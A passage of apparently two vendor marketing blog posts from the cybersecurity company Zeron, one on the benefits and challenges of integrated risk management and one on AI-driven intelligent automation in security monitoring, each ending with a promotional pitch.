    • More agile, risk-based decision making, based on having one view of top risks
    • Bridging the strategy/execution gap, assuring that project delivery is tied to the business’s organizational needs and vision
    • Identifying risks at the strategic level, which could have a major effect on the entire company
    • Empowering companies to manage these risks
    • Understanding that risks across the business create opportunities for cost savings, competitive advantages, and alignment
    • Enabling organizations to take the initiative with those opportunities, rather than just reacting to them
    • Minimizing cybersecurity threats and maximizing opportunities, boosting the chances of achieving strategic and operational objectives
    • Providing management with useful information to aid the decision-making process
    • Helping companies create risk-aware cultures, so employees understand that risk exists at all levels of the enterprise and that they can (and should) manage that risk smartly, reaping the most benefits
    • Improving operational efficiency by reducing the costs and cycle times of risk assessments

An integrated risk management framework is the formal, structured approach to governing risk. Applying an integrated risk management framework allows organizations to evaluate their risks by connecting the objectives, the organization’s functional departments, and the components of a risk assessment. The industry standards that help to establish strong cybersecurity controls often refer to IRM frameworks.

The challenges in realizing IRM technology benefits

Given the challenges presented by the current business environment, perhaps it is not surprising that many organizations are struggling to realize true IRM and the benefits that it brings. Tellingly, 72 percent of financial services risk managers surveyed by Accenture say that complex, interconnected new risks are emerging at a more rapid pace than ever before. The complexities and obstacles span people and culture, processes, technology, and data.

People: The small percentage of organizations reporting success in building a data-centric and data-literate culture have a fluid workforce equipped with the right skills. The lack of an enterprise strategy and C-level sponsorship for IRM can amplify the problems faced by everyone else.

Process: Companies have standardized processes across many risk functions, but many have not yet addressed implementing the technology to support these processes. Non-standardized risk processes with one-off customizations can result in difficult implementations of capabilities such as machine learning. 

Technology: Outmoded legacy tools from the GRC era have made it difficult to implement IRM across an entire risk organization. An additional complication is that risk organizations have historically operated in silos, with different technology solutions supporting individual risk functions. The resulting ecosystem looks more like a maze than a coherent blueprint. 

Data: Poor data quality results in only a third of firms trusting their data enough to use it effectively and derive value from it. Companies also find it hard to control and manage data at scale, inhibiting their ability to operationalize and use it for strategic purposes.

Concluding 

Shifting from a modular approach to managing cybersecurity and compliance, to integrating security, privacy, and risk is a daunting proposition. An integrated risk management approach requires security leaders to commit to the journey, not just for their teams and organization but the entire business as a whole. It will be challenging and the change won’t always be easy, but with the right allies, tools, and approach you and your organization can make the shift to integrated risk management. 

Zeron brings the power to your hands, with complete management and visualization support to make use of the capabilities in your organization. It provides a complete solution to manage your events and risks, with a full ticketing system and advanced defensive mechanisms.


Swimming in a pool of jargon, reading through numerous documents of varying lengths just to find more words to look up on a search engine, all to understand the process of automation in cybersecurity? Well, automation is computation at the end of the day, and computation can go wrong, can’t it? Whether from the perspective of a person seeking a solution to curb the chances of their company landing on the shame list, or of another looking for a solution to make tedious matters easy, automation is turning smarter.

Adding the edge of a smarter system, with adaptive machine learning systems making a breakthrough in the recent era, brings newer terms into the dictionary, such as Intelligent Automation (IA). IA is the strategic combination of a defensive artificial intelligence implementation with robotic process automation strategies, bringing an adaptive, effective, and buzz-worthy edge to the industry.

Looking at the cybersecurity spectrum we are talking about, IA systems stand a chance to prove themselves wherever the security of assets relies on effective solutions that safeguard information.

What are the Parts of IA we are Looking at?

    1. Artificial Intelligence and Machine Learning – Yes, I am aware of the hype that one comes across scrolling down nearly every technological article and even social media in recent days. Signature-based systems already detect more than 90% of attacks and patterns successfully; backing them with the strategic combination of AI and ML reduces the splurge of false positives produced by traditional single-technique implementations. Bringing together distanced resources in an organization and increasing the efficiency of threat hunting adds reactive services to the proactive ones, giving them more power through updated measures than traditional vulnerability-matching databases provide.
    2. Robotic Process Automation – RPA makes sense of the structured inputs and logic it is fed, forming the skeleton beneath the nervous system of AI and ML, and it is easier to implement on top of existing architectures and applications. If that isn’t a reason to implement IA without the “huge time building” objections, what is?

Proactive and Persistent Approach

Whether it is the rest of the world trying to pry into your systems while you are away from the working environment during active hours, or finding solutions that go beyond the likely scenarios for the stickiest of DDoS preventions; whether it is Windows Defender with real-time app scanning or large-scale business asset and fallout checks on a multiscale architecture, the need for a proactive and persistent approach is the same.

The main reasons for one to opt for the path of IA and automated measures can be boiled down to –

    • Efficient management in real time, cost-effective as compared to the manual skills traditionally required round the clock
    • Mitigating the probability of errors and false positives by balancing detection and sense-making capabilities, with AI and ML working in harmony
    • Prioritization of decisions through defensive approaches, helping to identify and secure susceptible endpoints

Not to mention the time saved, and an efficient raised-ticket system that staves off overlooking eyes in a matter of minutes, if not seconds. With a global cybersecurity workforce gap of more than 4 million, one can be sure of the hassle of bringing in new employees with the right skills; IA helps maintain efficiency with fewer of them.

Do we see a future?

A mixed-emotion answer contradicting everything above might be a disappointing conclusion to end this article on. Whether the answer is yes or no depends on how far the advancements in IA and automation measures have come. As attacks grow more sophisticated by the minute, the intelligence still lies in manual processes, from which the adaptive algorithms further sharpen their skills.

Already used in numerous applications, IAs have made their mark in sectors of utmost importance; as systems get smarter and intelligence sharper, the age of AI and IA comes sooner than one can expect.

A step ahead with Zeron

Zeron brings automation to reality with integrated security monitoring services that counter more than 1700 vulnerabilities, keeping you a step ahead of overlooking sights. It brings the nature of processing and securing to easier implementation and all-around protection 24/7.